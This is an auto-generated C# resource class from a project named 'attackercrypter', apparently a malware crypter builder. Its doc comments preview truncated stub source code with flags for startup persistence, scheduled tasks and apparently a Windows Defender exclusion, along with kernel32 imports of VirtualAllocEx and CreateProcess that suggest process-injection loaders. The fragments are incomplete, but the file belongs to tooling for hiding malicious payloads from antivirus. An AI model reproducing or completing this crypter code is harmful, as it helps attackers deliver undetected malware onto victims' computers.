//------------------------------------------------------------------------------
// <auto-generated>
//     This code was generated by a tool.
//     Runtime Version:4.0.30319.42000
//
//     Changes to this file may cause incorrect behavior and will be lost if
//     the code is regenerated.
// </auto-generated>
//------------------------------------------------------------------------------

namespace attackercrypter.Properties {
    using System;
    
    
    /// <summary>
    ///   A strongly-typed resource class, for looking up localized strings, etc.
    /// </summary>
    // This class was auto-generated by the StronglyTypedResourceBuilder
    // class via a tool like ResGen or Visual Studio.
    // To add or remove a member, edit your .ResX file then rerun ResGen
    // with the /str option, or rebuild your VS project.
    [global::System.CodeDom.Compiler.GeneratedCodeAttribute("System.Resources.Tools.StronglyTypedResourceBuilder", "17.0.0.0")]
    [global::System.Diagnostics.DebuggerNonUserCodeAttribute()]
    [global::System.Runtime.CompilerServices.CompilerGeneratedAttribute()]
    internal class Resources {
        
        private static global::System.Resources.ResourceManager resourceMan;
        
        private static global::System.Globalization.CultureInfo resourceCulture;
        
        [global::System.Diagnostics.CodeAnalysis.SuppressMessageAttribute("Microsoft.Performance", "CA1811:AvoidUncalledPrivateCode")]
        internal Resources() {
        }
        
        /// <summary>
        ///   Returns the cached ResourceManager instance used by this class.
        /// </summary>
        [global::System.ComponentModel.EditorBrowsableAttribute(global::System.ComponentModel.EditorBrowsableState.Advanced)]
        internal static global::System.Resources.ResourceManager ResourceManager {
            get {
                if (object.ReferenceEquals(resourceMan, null)) {
                    global::System.Resources.ResourceManager temp = new global::System.Resources.ResourceManager("attackercrypter.Properties.Resources", typeof(Resources).Assembly);
                    resourceMan = temp;
                }
                return resourceMan;
            }
        }
        
        /// <summary>
        ///   Overrides the current thread's CurrentUICulture property for all
        ///   resource lookups using this strongly typed resource class.
        /// </summary>
        [global::System.ComponentModel.EditorBrowsableAttribute(global::System.ComponentModel.EditorBrowsableState.Advanced)]
        internal static global::System.Globalization.CultureInfo Culture {
            get {
                return resourceCulture;
            }
            set {
                resourceCulture = value;
            }
        }
        
        /// <summary>
        ///   Looks up a localized string similar to using System;
        ///using System.Diagnostics;
        ///using System.IO;
        ///using System.Runtime.InteropServices;
        ///
        ///namespace Stubcry
        ///{
        ///
        ///    internal class config
        ///    {
        ///        public static bool istartup = false;
        ///        public static bool ispersist = false;
        ///        public static bool isNet = false;
        ///        public static bool isNative = false;
        ///        public static bool istask = false;
        ///        public static bool isdotnet = false;
        ///        public static bool isexcludewd = false;
        ///        public static bool issle [rest of string was truncated]&quot;;.
        /// </summary>
        internal static string config {
            get {
                return ResourceManager.GetString("config", resourceCulture);
            }
        }
        
        /// <summary>
        ///   Looks up a localized resource of type System.Drawing.Bitmap.
        /// </summary>
        internal static System.Drawing.Bitmap kali_linux_3 {
            get {
                object obj = ResourceManager.GetObject("kali-linux-3", resourceCulture);
                return ((System.Drawing.Bitmap)(obj));
            }
        }
        
        /// <summary>
        ///   Looks up a localized string similar to using System;
        ///using System.Collections.Generic;
        ///using System.ComponentModel;
        ///using System.Linq;
        ///using System.Runtime.InteropServices;
        ///using System.Text;
        ///
        ///namespace Stubcry
        ///{
        ///
        ///    class NIKBINARY32bit
        ///    {
        ///        [DllImport(&quot;kernel32.dll&quot;, SetLastError = true)]
        ///        private static extern IntPtr VirtualAllocEx(IntPtr process, IntPtr address, int size, uint allocationType, uint flProtect);
        ///        [DllImport(&quot;kernel32.dll&quot;, SetLastError = true)]
        ///        private static extern bool CreateProc [rest of string was truncated]&quot;;.
        /// </summary>
        internal static string Nik32 {
            get {
                return ResourceManager.GetString("Nik32", resourceCulture);
            }
        }
        
        /// <summary>
        ///   Looks up a localized string similar to using System;
        ///using System.Collections.Generic;
        ///using System.IO;
        ///using System.Linq;
        ///using System.Runtime.InteropServices;
        ///using System.Text;
        ///
        ///namespace Stubcry
        ///{
        ///    public static class nIK64
        ///    {
        ///        [DllImport(&quot;kernel32.dll&quot;)]
        ///        private static extern unsafe bool CreateProcess(
        ///          string lpApplicationName,
        ///          string lpCommandLine,
        ///          IntPtr lpProcessAttributes,
        ///          IntPtr lpThreadAttributes,
        ///          bool bInheritHandles,
        ///          uint dwCreationFla [rest of string was truncated]&quot;;.
        /// </summary>
        internal static string NIK64 {
            get {
                return ResourceManager.GetString("NIK64", resourceCulture);
            }
        }
        
        /// <summary>
        ///   Looks up a localized string similar to using System;
        ///using System.Collections.Generic;
        ///using System.Diagnostics;
        ///using System.Drawing;
        ///using System.IO;
        ///using System.Linq;
        ///using System.Net;
        ///using System.Reflection;
        ///using System.Runtime.InteropServices;
        ///using System.Security.Cryptography;
        ///using System.Text;
        ///using System.Net.Sockets;
        ///using System.Threading;
        ///using System.Windows.Forms;
        ///using System.Management;
        ///
        ///[assembly: AssemblyTitle(&quot;#AssemblyProduct&quot;)]
        ///[assembly: AssemblyDescription(&quot;#AssemblyDescription&quot;)]
        ///[assembly: AssemblyC [rest of string was truncated]&quot;;.
        /// </summary>
        internal static string Program {
            get {
                return ResourceManager.GetString("Program", resourceCulture);
            }
        }
    }
}
